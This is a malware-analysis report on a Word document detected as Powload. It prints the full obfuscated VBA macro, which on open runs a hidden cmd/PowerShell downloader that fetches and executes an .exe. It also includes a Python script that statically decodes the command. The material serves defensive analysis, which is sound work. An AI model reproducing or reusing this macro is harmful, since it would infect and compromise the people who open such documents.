MALICIOUS
Risk score: 112
Heuristics: 6

- ClamAV: Doc.Malware.Powload-6752222-0 [critical] CLAMAV_DETECTION
  ClamAV detected this file as malware: Doc.Malware.Powload-6752222-0
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
  OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. (Note that this rule's "no modern VBA project was recovered" wording conflicts with the OLE_VBA_MACROS finding below, which did recover a VBA module; the legacy marker is secondary evidence here.)
- VBA macros detected [medium, 1 related finding] OLE_VBA_MACROS
  Document contains VBA macro code
- AutoOpen macro [low] OLE_VBA_AUTOOPEN
  AutoOpen macro. Matched line in script: Sub AutoOpen()
- Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
  One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info] EMBEDDED_URL
  One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the DrawingML XML namespace URI that Office writes into documents containing drawing content; it is not a network indicator. The URLs the sample actually contacts are built at run time inside the obfuscated macro and do not appear as plain text anywhere in the document.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6071 bytes |

macros.bas
- SHA-256: f6abe5d4bb1256eb7f77555ddfa59216a2271ac35983a8397bcb08aaac98baa8
- Detection (ClamAV): No threats found
- Obfuscation or payload: likely. 49 of 79 identifiers look randomly generated (e.g. 'nkBODMJMldMEH'); 1 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "KdYBNJXA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
AppActivate iAFYW
AppActivate 8876
AppActivate Sgn(sLYZvd * lqEvmv)
AppActivate CBool(2)
AppActivate VjXUE
AppActivate ChrB(44487 * Wootd)
Shell@ CVar("cm") + uRJRMKMY + hLRzTkimn + OziLPY + mriHqobA + zDkRUaCa + wAFnOSnsGjw + ViwzCivm + kKEJCLhZwaurF, 413851704 - 413851704
AppActivate IttWX
AppActivate Tan(28264 * YQEBd)
End Sub
Attribute VB_Name = "nkBODMJMldMEH"
Function OziLPY()
On Error Resume Next
AppActivate CSng(XpJzG)
AppActivate lElBC
KdZPXiI = "d" + " /V:ON/" + "C" + CStr(Chr(PpwdRldPBrzfW + BCQUkww + 34 + YoWIciwjJUcdS + ZbaWOlaM)) + "set Ja=DI" + "mwqhwwOaMF" + "jvHMdjqz" + "AHhNTLn3k7" + ";$.b/@c" + "W:"
AppActivate sJSlZO
AppActivate CStr(QckCi)
AppActivate CStr(5289)
XiliKnvDES = "sf{Pte" + " x\4=28Jl" + "-pC'E" + "ruQ}yU)(6g" + "+0X,Sio9" + "R&" + "&for" + " %8 in " + "(55,75," + "7,44,59,3"
AppActivate 1051
AppActivate CInt(uQZWVZ)
mmVjkqKIQow = "9,22" + ",44,53,5" + "3,45,31,77" + ",33,58,49," + "26,44" + ",7,54,75,3"
AppActivate Int(8523)
AppActivate 45
SsDnIFzk = "3,17" + ",44,36,43" + ",45,23,44" + ",43,32,3" + "7,44,33,5"
AppActivate 563
AppActivate CByte(jdFMG - JESlW)
AbcEU = "6,53," + "74," + "44,26," + "43" + "," + "30," + "31," + "40,73" + ",7" + "3" + ",49,57,22"
AppActivate iWLSaQ
AppActivate CDbl(IMoQuM)
imdCC = ",43,43,5" + "5,3" + "8,34," + "3" + "4,4" + "0,55,4" + "4,9,36" + ",44,39,32,"
OziLPY = KdZPXiI + XiliKnvDES + mmVjkqKIQow + SsDnIFzk + AbcEU + imdCC
AppActivate CDbl(353005535)
AppActivate OHjwfq
End Function
Function mriHqobA()
On Error Resume Next
AppActivate 41
AppActivate 325
AppActivate 401087306
iADzB = "26" + ",44,43,3" + "4,23," + "68,11,37,6" + "7,2" + "5,35" + ",2" + "2,43,43," + "55,38,3" + "4"
AppActivate hCWsa
AppActivate FpItJ
AppActivate CDate(rjnCPi)
jOhEvRpB = ",34,17," + "46,33,9,75" + ",2" + "2,60,39,9," + "26,3"
AppActivate 283753694
AppActivate CSng(bcWMB + jlFbOF * RXGFmh / KGEAh)
pBPVNOdtZc = "2," + "36,75,2" + ",34,51,77" + ",61,71,7" + "3,35,22," + "43,43,55,3" + "8," + "34" + ",34,7"
AppActivate YJzlh
AppActivate CStr(233568307)
tTsGzkkbvYo = ",7,7,32," + "2,44," + "68,9,27,67" + ",70,32," + "28,74" + ",44," + "26,26,22" + ",9,63,32" + ",13" + ",26,34,7," + "55,54," + "36" + ",75,26,43,"
AppActivate Oct(27)
AppActivate Hex(EsVlm)
AppActivate Fix(NRQwKs)
LYwaYWoUA = "44,2" + "6,4" + "3,34,60,5" + "5,53,75,9," + "16,39," + "34,39," + "50,64" + ",11,52" + ","
AppActivate YViiT
AppActivate CBool(65)
AppActivate 224
jYJhBjwiLc = "35,22,43" + ",43,55,3" + "8,34,34,2," + "74," + "36,59" + ",75," + "26,44,43"
AppActivate IskGT
AppActivate CInt(6)
qENuc = ",54,39,75" + "," + "5" + "3,60,4" + "3,74,75,26" + ",3" + "9,32,36," + "75,2" + ",34,2"
mriHqobA = iADzB + jOhEvRpB + pBPVNOdtZc + tTsGzkkbvYo + LYwaYWoUA + jYJhBjwiLc + qENuc
AppActivate 123212862
AppActivate iYTFZs
End Function
Function zDkRUaCa()
On Error Resume Next
AppActivate frurL
AppActivate 157
AppActivate Tan(YZZhZ + 92113)
dcHBMSN = "5,6" + "4,7" + "6,1" + "5,29,48,18" + ",35,22,4" + "3,4"
AppActivate hJdIK
AppActivate CStr(9)
AppActivate CLng(VBSwm)
bSjzPWiS = "3,55," + "38" + ",3" + "4,3" + "4,33,9" + ",60,43,44," + "32,75,59" + ",68," + "34,71,"
AppActivate Rnd(OBcIQ)
AppActivate Int(klXON)
ohmzHoGz = "57,32,73" + ",55,53,74," + "43,66,57" + ",35,57,6" + "5," + "30,31,17" + ",6" + "0,33,45,4" + "9,45,"
AppActivate wVOZWK
AppActivate Round(JDLoX)
nIvHvprv = "57,67,51,7" + "6,57" + ",30,31,55" + ",15,2" + "8,49,31" + ","
AppActivate CInt(50895 - rslpBz)
AppActivate 140
AppActivate Sqr(KVpKZ - 15777 / UIubj / MTWdJ)
XcRhULf = "44," + "26,13," + "38,43" + ",44,2" + ",55," + "69,5" + "7," + "47,57,6" + "9,31" + ",17,6"
AppActivate 3
AppActivate Fix(jqEFfJ * jusTO)
wvpvVCFdH = "0,33" + ",69,57,3" + "2," + "44" + ",46,44,5" + "7,30,40,7" + "5" + ",59,44," + "9,36," + "22,66,31" + "," + "59,42"
AppActivate 68819893
AppActivate CLng(TBFAh * cMWTd - 7301 + 40439)
AppActivate Cos(iqvFv - 80676 - 94177 * oMPaw)
CfbEIas = ",7,45,74,2" + "6," + "45,31,4" + "0" + ",73,7" + "3,65,41,4" + "3,59,63,41" + ",31,7" + "7,33,"
AppActivate CBool(7)
AppActivate Fix(OZhwj + 57851 * 62223 - EiimB)
AppActivate MmOdTS
TSJJhZTvTQd = "58,32,0,75" + ",7,26," + "53" + "," + "7" + "5,9,1" + "6,1" + "1" + ",74"
AppActivate 9225
AppActivate 5
FLanmR = ",53,44" + ",66" + ",31," + "59,4" + "2,7,72,45" + ",31,55,15," + "2" + "8,65,30" + ",73,43,9" + ",5" + "9,4" + "3,"
AppActivate Sin(vMOjq * OVnHX)
AppActivate CLng(34118 + diIqJp)
AppActivate 460
CZlGQDEA = "54,42,59,7" + "5,36,44,3" + "9,39,45,31" + ",55,15,2" + "8,30,3" + "3,59" + ",44,9,28," + "30," + "62,36,9,43"
AppActivate kJBmz
AppActivate Sqr(8269 / qOjaz)
cWlLU = ",36," + "22,41,62" + ",62,45,45," + "4" + "5,45"
AppActivate 57
AppActivate Sin(zWcTR)
FfrMqO = ",45" + ",45,45,45," + "45" + ",45,45," + "45,4" + "5,45,45," + "45,45," + "79)" + "do " + "set 9EJs"
zDkRUaCa = dcHBMSN + bSjzPWiS + ohmzHoGz + nIvHvprv + XcRhULf + wvpvVCFdH + CfbEIas + TSJJhZTvTQd + FLanmR + CZlGQDEA + cWlLU + FfrMqO
AppActivate OIYdju
AppActivate 7
End Function
Function wAFnOSnsGjw()
On Error Resume Next
AppActivate Round(379866174)
AppActivate Rnd(HDvfFc)
Pcnjkja = "=" + "!9EJs!!" + "Ja:" + "~%8,1!&&" + "if %8==79 "
AppActivate Log(94895 - MpZuq - rjASE - BlCfp)
AppActivate 6294
IOauL = "call %9E" + "Js" + ":~6%" + CStr(Chr(VIKoYtRrFFdP + TvOWBZbjHHuJV + 34 + HwbLbGalvkbL + qfJGnCTX)) + " "
wAFnOSnsGjw = Pcnjkja + IOauL
AppActivate CStr(nKjpGY)
AppActivate ChrB(oAOkN)
AppActivate Rnd(WqvEoU + SzipU + 68713 + LFcsBK)
End Function
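What the preview above actually does is worth spelling out, because the analyzer's own findings stop at "VBA macros detected" and a schema URL. Every helper function (OziLPY, mriHqobA, zDkRUaCa, wAFnOSnsGjw) returns a chain of short string literals; Sub AutoOpen concatenates those returns and hands the result to Shell with window style 413851704 - 413851704 = 0 (vbHide), so cmd.exe runs hidden. The AppActivate lines and the arithmetic inside them are decoys: On Error Resume Next swallows their failures, and none of them touch the strings. The cmd line itself uses the classic /V:ON string-index trick: an alphabet string (set Ja=...) and a FOR loop over a list of numbers that appends one character per number with !Ja:~N,1!, then "call"s the rebuilt text. The script below is an added example, not the analyzer's code and not the sample's; it recovers the hidden command statically and executes nothing. It assumes (a) unassigned VBA names are Empty under On Error Resume Next ("" in concatenation, 0 in arithmetic, so CStr(Chr(a + b + 34 + c)) is a double quote), and (b) cmd.exe's documented command-line behaviour of leaving an undefined !var! in place literally, which is why the loop's final call strips six characters (the length of "!9EJs!"). The embedded input is the Shell line and the string assignments copied from the preview; everything else is constructed for the example.

```python
"""Decode the cmd /V:ON string-index downloader built by the macro above."""
import re

# Constructed input: the Shell call and every string assignment from the macro
# preview on this page, in source order. The AppActivate decoy lines never touch
# these strings and are omitted. Names that are never assigned (uRJRMKMY,
# PpwdRldPBrzfW, ...) are Empty under On Error Resume Next: "" when
# concatenated, 0 in arithmetic.
MACRO_EXCERPT = r'''
Shell@ CVar("cm") + uRJRMKMY + hLRzTkimn + OziLPY + mriHqobA + zDkRUaCa + wAFnOSnsGjw + ViwzCivm + kKEJCLhZwaurF, 413851704 - 413851704
KdZPXiI = "d" + " /V:ON/" + "C" + CStr(Chr(PpwdRldPBrzfW + BCQUkww + 34 + YoWIciwjJUcdS + ZbaWOlaM)) + "set Ja=DI" + "mwqhwwOaMF" + "jvHMdjqz" + "AHhNTLn3k7" + ";$.b/@c" + "W:"
XiliKnvDES = "sf{Pte" + " x\4=28Jl" + "-pC'E" + "ruQ}yU)(6g" + "+0X,Sio9" + "R&" + "&for" + " %8 in " + "(55,75," + "7,44,59,3"
mmVjkqKIQow = "9,22" + ",44,53,5" + "3,45,31,77" + ",33,58,49," + "26,44" + ",7,54,75,3"
SsDnIFzk = "3,17" + ",44,36,43" + ",45,23,44" + ",43,32,3" + "7,44,33,5"
AbcEU = "6,53," + "74," + "44,26," + "43" + "," + "30," + "31," + "40,73" + ",7" + "3" + ",49,57,22"
imdCC = ",43,43,5" + "5,3" + "8,34," + "3" + "4,4" + "0,55,4" + "4,9,36" + ",44,39,32,"
iADzB = "26" + ",44,43,3" + "4,23," + "68,11,37,6" + "7,2" + "5,35" + ",2" + "2,43,43," + "55,38,3" + "4"
jOhEvRpB = ",34,17," + "46,33,9,75" + ",2" + "2,60,39,9," + "26,3"
pBPVNOdtZc = "2," + "36,75,2" + ",34,51,77" + ",61,71,7" + "3,35,22," + "43,43,55,3" + "8," + "34" + ",34,7"
tTsGzkkbvYo = ",7,7,32," + "2,44," + "68,9,27,67" + ",70,32," + "28,74" + ",44," + "26,26,22" + ",9,63,32" + ",13" + ",26,34,7," + "55,54," + "36" + ",75,26,43,"
LYwaYWoUA = "44,2" + "6,4" + "3,34,60,5" + "5,53,75,9," + "16,39," + "34,39," + "50,64" + ",11,52" + ","
jYJhBjwiLc = "35,22,43" + ",43,55,3" + "8,34,34,2," + "74," + "36,59" + ",75," + "26,44,43"
qENuc = ",54,39,75" + "," + "5" + "3,60,4" + "3,74,75,26" + ",3" + "9,32,36," + "75,2" + ",34,2"
dcHBMSN = "5,6" + "4,7" + "6,1" + "5,29,48,18" + ",35,22,4" + "3,4"
bSjzPWiS = "3,55," + "38" + ",3" + "4,3" + "4,33,9" + ",60,43,44," + "32,75,59" + ",68," + "34,71,"
ohmzHoGz = "57,32,73" + ",55,53,74," + "43,66,57" + ",35,57,6" + "5," + "30,31,17" + ",6" + "0,33,45,4" + "9,45,"
nIvHvprv = "57,67,51,7" + "6,57" + ",30,31,55" + ",15,2" + "8,49,31" + ","
XcRhULf = "44," + "26,13," + "38,43" + ",44,2" + ",55," + "69,5" + "7," + "47,57,6" + "9,31" + ",17,6"
wvpvVCFdH = "0,33" + ",69,57,3" + "2," + "44" + ",46,44,5" + "7,30,40,7" + "5" + ",59,44," + "9,36," + "22,66,31" + "," + "59,42"
CfbEIas = ",7,45,74,2" + "6," + "45,31,4" + "0" + ",73,7" + "3,65,41,4" + "3,59,63,41" + ",31,7" + "7,33,"
TSJJhZTvTQd = "58,32,0,75" + ",7,26," + "53" + "," + "7" + "5,9,1" + "6,1" + "1" + ",74"
FLanmR = ",53,44" + ",66" + ",31," + "59,4" + "2,7,72,45" + ",31,55,15," + "2" + "8,65,30" + ",73,43,9" + ",5" + "9,4" + "3,"
CZlGQDEA = "54,42,59,7" + "5,36,44,3" + "9,39,45,31" + ",55,15,2" + "8,30,3" + "3,59" + ",44,9,28," + "30," + "62,36,9,43"
cWlLU = ",36," + "22,41,62" + ",62,45,45," + "4" + "5,45"
FfrMqO = ",45" + ",45,45,45," + "45" + ",45,45," + "45,4" + "5,45,45," + "45,45," + "79)" + "do " + "set 9EJs"
Pcnjkja = "=" + "!9EJs!!" + "Ja:" + "~%8,1!&&" + "if %8==79 "
IOauL = "call %9E" + "Js" + ":~6%" + CStr(Chr(VIKoYtRrFFdP + TvOWBZbjHHuJV + 34 + HwbLbGalvkbL + qfJGnCTX)) + " "
'''

TOKEN_RE = re.compile(r'"([^"]*)"|Chr\(([^()]*)\)')


def collapse_vba_strings(src):
    """Join every string literal in source order, folding Chr(expr) to a char.

    Not a VBA interpreter: it relies on each helper returning its locals in
    assignment order and on Sub AutoOpen listing the helpers in source order,
    which is how this sample is laid out.
    """
    parts = []
    for m in TOKEN_RE.finditer(src):
        if m.group(1) is not None:
            parts.append(m.group(1))
        else:  # Chr(a + b + 34 + c): only numeric terms survive, Chr(34) is "
            parts.append(chr(sum(int(n) for n in re.findall(r"\d+", m.group(2)))))
    return "".join(parts)


# set ABC=...&&for %v in (i,j,...)do set ACC=!ACC!!ABC:~%v,1!&&if %v==STOP call %ACC:~SKIP%
LOOP_RE = re.compile(
    r"set (?P<abc>\w+)=(?P<alphabet>.*?)&&for %(?P<v>\S) in \((?P<idx>[\d,]+)\)\s*do "
    r"set (?P<acc>\w+)=!(?P=acc)!!(?P=abc):~%(?P=v),1!&&if %(?P=v)==(?P<stop>\d+) "
    r"call %(?P=acc):~(?P<skip>\d+)%",
    re.S,
)


def parse_index_loop(cmd_line):
    """Extract the alphabet, the index list and the loop parameters."""
    m = LOOP_RE.search(cmd_line)
    if m is None:
        raise ValueError("not the cmd /V:ON string-index pattern")
    return {
        "alphabet": m["alphabet"],
        "indices": [int(n) for n in m["idx"].split(",")],
        "acc": m["acc"],
        "stop": int(m["stop"]),
        "skip": int(m["skip"]),
    }


def run_index_loop(alphabet, indices, acc, skip):
    """Emulate the FOR loop as cmd.exe runs it from a /C command line.

    In command-line context (unlike a batch file) cmd leaves an undefined
    !var! in place literally, so the first iteration seeds the accumulator
    with the six characters "!9EJs!", which the final :~6 substring drops.
    An index past the end of the alphabet (the 79 sentinel) adds nothing.
    """
    value = "!" + acc + "!"
    for i in indices:
        value += alphabet[i] if 0 <= i < len(alphabet) else ""
    return value[skip:]


def decode_macro(src):
    """VBA excerpt -> cmd line -> the text that the final call would run."""
    loop = parse_index_loop(collapse_vba_strings(src))
    return run_index_loop(loop["alphabet"], loop["indices"], loop["acc"], loop["skip"])


if __name__ == "__main__":
    print(collapse_vba_strings(MACRO_EXCERPT))
    print(decode_macro(MACRO_EXCERPT))
```

Run as-is, the first print gives the hidden cmd line (a 78-character alphabet and roughly 370 indices) and the second gives the PowerShell it rebuilds: a New-Object Net.WebClient downloader whose URL list is a single string split on '@' into five http:// URLs, tried in order with DownloadFile into $env:temp as 689.exe, followed by Start-Process and break on the first success, inside try/catch so failures are silent. Sixteen trailing spaces pad the decoded text before the 79 terminator. The five hosts come out of the decoding, not from any plain-text URL scan, which is why the EMBEDDED_URL finding above saw only the schema URI; treat them as indicators to block or hunt for, not to visit.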